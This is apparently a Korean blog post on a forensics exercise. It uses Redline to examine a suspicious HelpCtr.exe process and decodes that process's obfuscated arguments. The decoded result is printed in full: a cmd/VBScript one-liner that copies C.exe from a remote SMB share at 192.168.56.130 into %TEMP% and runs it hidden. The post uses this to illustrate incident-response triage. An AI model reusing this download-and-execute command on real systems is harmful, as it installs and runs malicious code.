반응형

Redline을 이용하여 예제문제로 분석해보자  





Hierarchical Processess에서 HelpCtr.exe를 상세보기하니 Arguments에 이상한 값이 나타있고
SID값이 500이므로 수상하다. 








Arguments값이 URL 인코딩되어있는데 디코딩하면 위와 같은 결과를 확인 할 수 있다.








<프로그램 출처  -  http://bbolmin.tistory.com/66 >

<script>부분부터 긁어서 이것을 Ascii코드 Decode를 하면 위와 같은 결과를 알 수 있다.

결과
cmd /c echo WScript.CreateObject("WScript.Shell").Run "cmd /c copy \\192.168.56.130\w\C.exe %TEMP% && %TEMP%\C.exe",0,false>%TEMP%\fW.vbs|cscript %TEMP%\fW.vbs>nul


위의 결과에서 여러가지 정보를 추출 할 수 있다. 
TEMP폴더를 사용하며 192.168.56.130이 공격지가 되고 C.exe가 파일이 된다. TEMP폴더를 재부팅하면 없어지는 폴더이기때문에 휘발성이 높은 데이터라고 볼 수 있다. 이렇게 빠르게 데이터를 수집하면 정보를 빨리 찾을 수 있으며 위의 같은 경우에도 어떤 것이 바이러스 인지 알고 있기때문에 빨리 찾은거지 실제로는 많은 시간이 많이 걸리게 된다.    



반응형
  • 네이버 블러그 공유하기
  • 네이버 밴드에 공유하기
  • 페이스북 공유하기
  • 카카오스토리 공유하기